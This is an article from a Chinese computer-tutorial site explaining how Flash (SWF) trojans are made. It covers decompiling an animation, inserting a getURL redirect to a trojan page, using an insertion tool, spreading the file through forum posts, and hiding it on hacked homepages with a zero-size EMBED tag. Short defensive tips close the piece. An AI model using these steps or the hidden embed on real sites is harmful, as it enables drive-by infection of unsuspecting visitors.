萬盛學電腦網

 萬盛學電腦網 >> 病毒防治 >> 知已知彼 黑客如何制作Flash木馬程序

知已知彼 黑客如何制作Flash木馬程序

  在網站上觀看Flash動畫,接收到“好友”發來的一張Flash賀卡,甚至於一個QQ魔法表情,一不留神就中了一個木馬!Flash動畫木馬可以說是無處不在,攻擊威力和覆蓋面極其廣。許多朋友一定想了解Flash木馬的原理,想知道攻擊者是如何在SWF中插入木馬的呢?我們應該怎麼樣來防范Flash木馬呢?

  一、制作Flash動畫木馬的准備

  Flash動畫木馬的原理,是在網頁中顯示或本地直接播放Flash動畫木馬時,讓Flash自動打開一個網址,而該網址就是我們預先制作好的一個木馬網頁。也就是說,在制作網頁木馬前,我們首先需要制作好一個網頁木馬,並將它放置到某個網站上去。

  另外,我們還需要准備一個比較吸引人的Flash動畫文件“MM熱舞.swf”,以及Flash動畫反編譯工具“閃客精靈”,編輯工具Macromedia Flash MX。

  二、最原始的Flash木馬

  現在雖然有了許多各種各樣的Flash動畫木馬制作工具,但是為了了解Flash動畫木馬的最基本原理,有必要從頭開始用最原始的方法制作一個Flash木馬。

  步驟一:反編譯SWF動畫

  首先我們需要將要插入網頁木馬的Flash動畫文件“MM熱舞.swf”,反編譯成可編輯的.fla格式。運行“閃客精靈”,點擊菜單“文件”→“快速打開”命令,指定“MM熱舞.swf”文件將其導入。然後點擊工具欄上的“導出FLA”命令,將動畫導出為“MM熱舞.fla”文件。

  步驟二:插入網頁木馬代碼

  然後運行Flash動畫編輯器Macromedia Flash MX,點擊菜單“文件”→“打開”,調入剛才保存的fla文件。展開界面下方的“動作/幀”欄,再展開“動作”→“浏覽器/網絡”項,點擊其中的“getURL”命令,在右邊窗口中的“URL”裡面輸入我們的網頁木馬地址;窗口方式為“_blank”;“變量”設置為“使用GET方式發送”,在下方的代碼窗口中將出現“getURL("http://網頁木馬地址", "_blank", "GET");”。

  步驟三:生成Flash木馬

  設置完畢後保存文件,並點擊菜單“文件”→“發布”命令,將動畫重新導出為SWF格式。用IE浏覽器打開剛才生成的Flash動畫木馬,可以看到隨著Flash動畫打開播放時,自動彈出一個浏覽器窗口,裡面將會顯示我們的木馬網頁。

  三、簡簡單單生成Flash木馬

  上面插入木馬的過程比較麻煩,下面我們介紹一個簡單的方法,也正是這些簡單的工具使得Flash木馬在網上隨處可見。

  運行SWF木馬插入器,點擊界面中的“選擇”按鈕,浏覽指定要插入木馬的SWF文件;在“插入代碼”中輸入木馬網頁的地址;切記不要勾選下面的“只解壓”項。設置完畢後,點擊“給我插”按鈕,程序提示開始插入木馬網頁。顯示成功信息後,關閉程序,用IE打開生成的動畫,可以看到自動跳轉到木馬網頁去了。

  四、Flash木馬的利用

  看到上面的步驟了吧,生成一個Flash動畫木馬是不是很簡單? 那麼生成的Flash木馬該如何應用呢?只要我們將Flash上傳到某個網站中,就可以通過論壇或網站之類的直接利用了。

  大部分的論壇中都可以發來Flash動畫的帖子,利用論壇發帖,攻擊者可以快速獲得大量的肉雞。以PHPWind v4.3.2 論壇為例,在發帖或回復時,點擊編輯窗口上方的“插入Flash動畫”按鈕,設置Flash窗口大小,使用默認設置後,要求輸入Flash的URL地址。確定後,可以看到編輯窗口中顯示的代碼為““(flash=400,300)hxxp://www.flash**.com.cn/upfiles/20067**.swf(/flash)””,這就是完整的Flash播放代碼了,不同的論壇代碼是不一樣的。

  應用二:網頁嵌入Flash木馬

  攻擊者入侵了某個大的網站之後,很可能在網站首頁掛馬,使用普通方式掛馬會被管理員發覺,但是掛上Flash木馬的話,是很難查殺的。攻擊者可能在網頁中插入如下代碼:

  “《EMBED src=http://網頁木馬地址/木馬.swf width=0 height=0 type=application/x-shockwave-flash AUTOSTART="false" ShowStatusBar="false"》”,其中的《》改為<>。

  這裡的參數“width=0 height=0”表示,Flash播放窗口為零,也就是不顯示Flash播放窗口。其它用戶浏覽網頁時,就會莫名其妙的彈出一個木馬網頁窗口。

  五、關於Flash木馬的防范

  其實不管Flash木馬有多麼的巧妙,最終都是要跳轉到木馬網頁去的,也就是說我們最終要防范的還是網頁木馬。了解了思路,對於Flash動畫木馬就簡單了:

  首先,要開啟Windows XP SP2的窗口攔截窗口功能,或安裝其它防彈出窗口的插件。如果那個漏網之魚,莫名其妙彈出的網頁窗口要及時的關閉。另外,一定要在上網浏覽時開啟殺毒軟件的網頁監控功能,只要網頁木馬在後台一下載到本地硬盤,就會被殺毒軟件查殺,這樣就萬事無憂了!

  PS:本文中對代碼做了一些處理。

copyright © 萬盛學電腦網 all rights reserved